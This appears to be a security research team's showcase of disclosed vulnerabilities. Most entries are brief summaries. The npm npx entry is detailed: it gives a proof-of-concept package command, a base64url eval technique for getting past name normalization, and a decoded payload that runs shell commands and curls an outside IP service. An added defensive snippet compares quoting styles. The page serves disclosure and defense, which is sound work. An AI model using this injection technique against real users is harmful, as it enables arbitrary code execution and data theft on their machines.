Showcase

The Ghost Security Research team has discovered and disclosed a number of vulnerabilities using Ghost Security Agent Skills.


Recent research

| Discovered | Vulnerability | Type | Project | Language |
|---|---|---|---|---|
| Mar. 2026 | GSR-2026-03-004 | BOLA | [redacted] community platform | Ruby |
| Mar. 2026 | GSR-2026-03-003 | SQL Injection | [redacted] CMS platform | Ruby |
| Mar. 2026 | GSR-2026-03-002 | Command Injection | [redacted] CMS platform | Ruby |
| Mar. 2026 | GSR-2026-03-001 | BOLA | [redacted] operations platform | Python |
| Feb. 2026 | GSR-2026-02-007 | Stored XSS | [redacted] CMS platform | JavaScript |
| Feb. 2026 | GSR-2026-02-006 | Auth Session Expiry | [redacted] database | TypeScript |
| Feb. 2026 | GSR-2026-02-005 | BOLA | [redacted] vuln mgmt platform | Python |
| Feb. 2026 | GSR-2026-02-004 | BOLA | [redacted] vuln mgmt platform | Python |
| Feb. 2026 | GSR-2026-02-003 | Command Injection | NPM package manager | JavaScript |
| Feb. 2026 | GSR-2026-02-002 | TOCTOU | [redacted] commerce platform | Ruby |
| Feb. 2026 | GSR-2026-02-001 | TOCTOU | [redacted] commerce platform | Ruby |

GSR-2026-03-004

  • Project: [redacted] community platform
  • Vulnerability: BOLA (4 instances)
  • Status: Maintainers notified privately; disclosure pending

The Ghost Research Team discovered four broken object level authorization vulnerabilities in the [redacted] community platform. The application's authorization policies for several admin controllers delegate instance-level checks to collection-level checks, verifying only that the requesting user belongs to any organization — not that they have access to the specific record. An authenticated attacker with access to one organization can read PII and modify records belonging to any other organization in the system.

Additional details to follow, pending disclosure timeline.

GSR-2026-03-003

  • Project: [redacted] CMS platform
  • Vulnerability: SQL Injection
  • Status: Maintainers notified privately; disclosure pending

The Ghost Research Team discovered a SQL injection vulnerability in the [redacted] CMS platform. A user-supplied sort parameter from the query string is parsed and interpolated directly into a raw SQL ORDER BY clause with no allowlist or escaping. An unauthenticated attacker can inject arbitrary SQL subqueries through any public page that uses the affected helper, enabling data exfiltration from the database.

Additional details to follow, pending disclosure timeline.

GSR-2026-03-002

  • Project: [redacted] CMS platform
  • Vulnerability: Command Injection
  • Status: Maintainers notified privately; disclosure pending

The Ghost Research Team discovered a command injection vulnerability in the [redacted] CMS platform. The application evaluates a user-supplied expression for custom webhook verification, protected by a keyword blacklist. The blacklist fails to account for an alternative language-level syntax for shell execution, allowing an attacker to execute arbitrary OS commands on the server. The exploit requires no authentication — a single HTTP POST to a webhook endpoint triggers the payload, and command output is returned in the response body.

Additional details to follow, pending disclosure timeline.

GSR-2026-03-001

  • Project: [redacted] operations platform
  • Vulnerability: BOLA (2 instances)
  • Status: Maintainers notified privately; disclosure pending

The Ghost Research Team discovered two broken object level authorization vulnerabilities in the [redacted] operations platform. When performing a DELETE operation on a resource with a query parameter specifying a destination, the application verifies access on the source object being deleted but fails to validate ownership of the destination. A restricted user can exploit this to move resources into another tenant's scope, bypassing tenant isolation.

Additional details to follow, pending disclosure timeline.

GSR-2026-02-007

  • Project: [redacted] CMS platform
  • Vulnerability: Stored XSS/Credential Exfiltration
  • Status: Maintainers notified privately; patch pending

The Ghost Research Team discovered a stored cross-site scripting (XSS) vulnerability in the [redacted] CMS platform. A process that ingests social media content fails to sanitize certain fields and persists them to the database. When an admin views the content, the UI renders and executes the stored JavaScript. The exploit payload provided demonstrated silent exfiltration of an admin API token via an img URL, which gives the attacker admin access to the CMS platform.

Additional details to follow, pending disclosure timeline.

GSR-2026-02-006

  • Project: [redacted] database
  • Vulnerability: Auth Session Expiry
  • Status: Maintainers notified privately; disclosure pending

The Ghost Research Team discovered an authentication expiration time vulnerability in the [redacted] database. The issue allows JWT tokens to survive past a 15-minute expiration timeout despite a specific setting that expires them after 15 minutes.

Additional details to follow, pending disclosure timeline.

GSR-2026-02-005

  • Project: [redacted] vulnerability management platform
  • Vulnerability: BOLA
  • Status: Maintainers notified privately; patch pending

The Ghost Research Team discovered a broken object level authorization vulnerability in the [redacted] vulnerability management platform. The vulnerability allows any authenticated user with a read-only role to trigger an update on a resource that integrates with an external system.

Additional details to follow, pending disclosure timeline.

GSR-2026-02-004

  • Project: [redacted] vulnerability management platform
  • Vulnerability: BOLA
  • Status: Maintainers notified privately; disclosure pending

The Ghost Research Team discovered a broken object level authorization vulnerability in the [redacted] vulnerability management platform. The issue allows for a scoped resource containing sensitive data to be read by all users in the global scope.

Additional details to follow, pending disclosure timeline.

GSR-2026-02-003

  • Project: NPM package manager
  • Vulnerability: Command injection
  • Status: Maintainers notified privately; classified as not a security risk

The Ghost Research Team discovered a command injection vulnerability in the NPM package manager. The vulnerability allows an attacker to execute arbitrary code on a system that uses the package manager to dynamically run packages via the npx command, potentially exfiltrating sensitive data or leading to system compromise.

Vulnerability

A malicious package author can set bin key names in package.json containing POSIX shell metacharacters. The bin key is the name of a command provided by the package, while the value is expected to be the command itself. When a victim runs npx <package>, the bin key is extracted from the fetched manifest, wrapped in double quotes, and passed to sh -c. Double quotes do not prevent $() command substitution in POSIX sh. The escape.sh() function that properly single-quotes values is applied to arguments only, but not to the command name (the bin key).

The consent prompt displays only the package name and version. The malicious bin key name is never shown to the user.

Reproduction

```sh
# From any directory:
npx @ghostsecurity/npx-bin-key-poc

# After the command exits:
ls -la npx-poc-pwned
# If this file exists, command injection occurred.
```

What happens

  1. npx fetches the manifest for @ghostsecurity/npx-bin-key-poc
  2. Consent prompt shows: "Need to install: @ghostsecurity/npx-bin-key-poc@0.0.2"
  3. User approves (the bin key name is not visible to the user)
  4. getBinFromManifest() returns the bin key containing $(node -e "eval(...)")
  5. run-script.js wraps it in double quotes (which don't prevent $() expansion)
  6. promise-spawn builds: sh -c '"$(node -e "eval(...)")"'
  7. Shell evaluates $() — Node decodes and executes the base64url payload:
    • touch npx-poc-pwned — creates marker file in cwd
    • curl -s ipinfo.io — fetches victim's public IP info (or anything else the attacker wants to run)
    • writes response to stderr — displayed on victim's terminal (optionally, could be suppressed)

The injected commands have already executed at step 7.

Payload technique

Bin key names are normalized by normalizePackageBin() which runs path.basename() (strips /) and secureAndUnixifyPath() (replaces \ and : with /). This means the bin key cannot contain /, \, or :.

To bypass this, the payload is encoded as JavaScript, base64url-encoded (alphabet A-Za-z0-9-_ — no forbidden characters), and decoded at runtime via node -e "eval(Buffer.from('...','base64url').toString())". Since npx requires Node.js, node is always available. This allows arbitrary commands including complex URLs with paths and query parameters.

The decoded JavaScript:

```js
const e = require("child_process").execSync;
e("touch npx-poc-pwned");
process.stderr.write(e("curl -s ipinfo.io"));
process.stderr.write("\n");
```

Affected code path

  • libnpmexec/lib/get-bin-from-manifest.js:7 — returns Object.keys(bin)[0] without validation
  • libnpmexec/lib/run-script.js:22 — args[0] = '"' + args[0] + '"' (double quotes, not single)
  • @npmcli/promise-spawn/lib/index.js:78,118-121 — escape.sh() applied to args, not command name

Impact

Arbitrary command execution as the victim user. An attacker publishes a package to any npm registry. The victim runs npx <package> and approves the install prompt (which reveals nothing suspicious). The injected commands run with the victim's full privileges.

A real attacker could exfiltrate environment variables, tokens, SSH keys, or install persistent backdoors — all triggered by a single npx invocation.

Variants: $(), backtick `...`, and double-quote breakout "$(...)" all work.
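As a defensive illustration of the quoting behaviour described above, the following added example (not npm's code and not part of the original write-up) audits a manifest's bin keys against an allowlist and shows what sh sees for each listed variant under double versus single quoting. The names findUnsafeBinKeys, SAFE_BIN_NAME, shellSees and compareQuoting, the allowlist pattern, and the sample manifest are assumptions constructed for this example; a harmless echo stands in for an injected command.

```javascript
const { spawnSync } = require("child_process");

// Assumption: a conservative allowlist for command names (not npm's own rule).
const SAFE_BIN_NAME = /^[A-Za-z0-9][A-Za-z0-9._-]*$/;

// Return the bin command names in a manifest that fall outside the allowlist.
function findUnsafeBinKeys(manifest) {
  const bin = manifest.bin;
  if (!bin) return [];
  // A string `bin` means the command is named after the package (scope dropped).
  const names = typeof bin === "string"
    ? [String(manifest.name).split("/").pop()]
    : Object.keys(bin);
  return names.filter((name) => !SAFE_BIN_NAME.test(name));
}

// The wrapping the page attributes to run-script.js: plain double quotes.
const doubleQuote = (s) => '"' + s + '"';

// POSIX single quoting: close the quote, emit an escaped ', reopen the quote.
const singleQuote = (s) => "'" + s.replace(/'/g, "'\\''") + "'";

// Hand one quoted word to sh and return the text the shell expanded it to.
function shellSees(quotedWord) {
  const r = spawnSync("sh", ["-c", "printf %s " + quotedWord], { encoding: "utf8" });
  return r.stdout;
}

// Constructed manifest: one key per variant listed on the page, using echo only.
const sampleManifest = {
  name: "@example/constructed-demo",
  version: "0.0.0",
  bin: {
    "ok-tool": "cli.js",
    "$(echo INJECTED)": "cli.js",
    "`echo INJECTED`": "cli.js",
    'x"$(echo INJECTED)"y': "cli.js",
  },
};

// For every flagged key, compare the shell's view under both quoting styles.
function compareQuoting(manifest) {
  return findUnsafeBinKeys(manifest).map((key) => ({
    key,
    doubleQuoted: shellSees(doubleQuote(key)),
    singleQuoted: shellSees(singleQuote(key)),
  }));
}

console.table(compareQuoting(sampleManifest));
```

In the doubleQuoted column the substitution has run; in the singleQuoted column the key arrives at the shell as literal text.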

GSR-2026-02-002

  • Project: [redacted] commerce platform
  • Vulnerability: TOCTOU
  • Status: Maintainers notified privately; disclosure pending

The Ghost Research Team discovered a time of check to time of use vulnerability in the [redacted] commerce platform. The vulnerability allows an attacker to exploit a race condition in the order checkout process to tamper with multiple order attributes, potentially leading to fraudulent orders.

Additional details to follow, pending disclosure timeline.

GSR-2026-02-001

  • Project: [redacted] commerce platform
  • Vulnerability: TOCTOU
  • Status: Maintainers notified privately; disclosure pending

The Ghost Research Team discovered a broken object level authorization vulnerability in the [redacted] commerce platform. The vulnerability allows an attacker to redeem gift card balances multiple times, potentially leading to financial loss.

Additional details to follow, pending disclosure timeline.
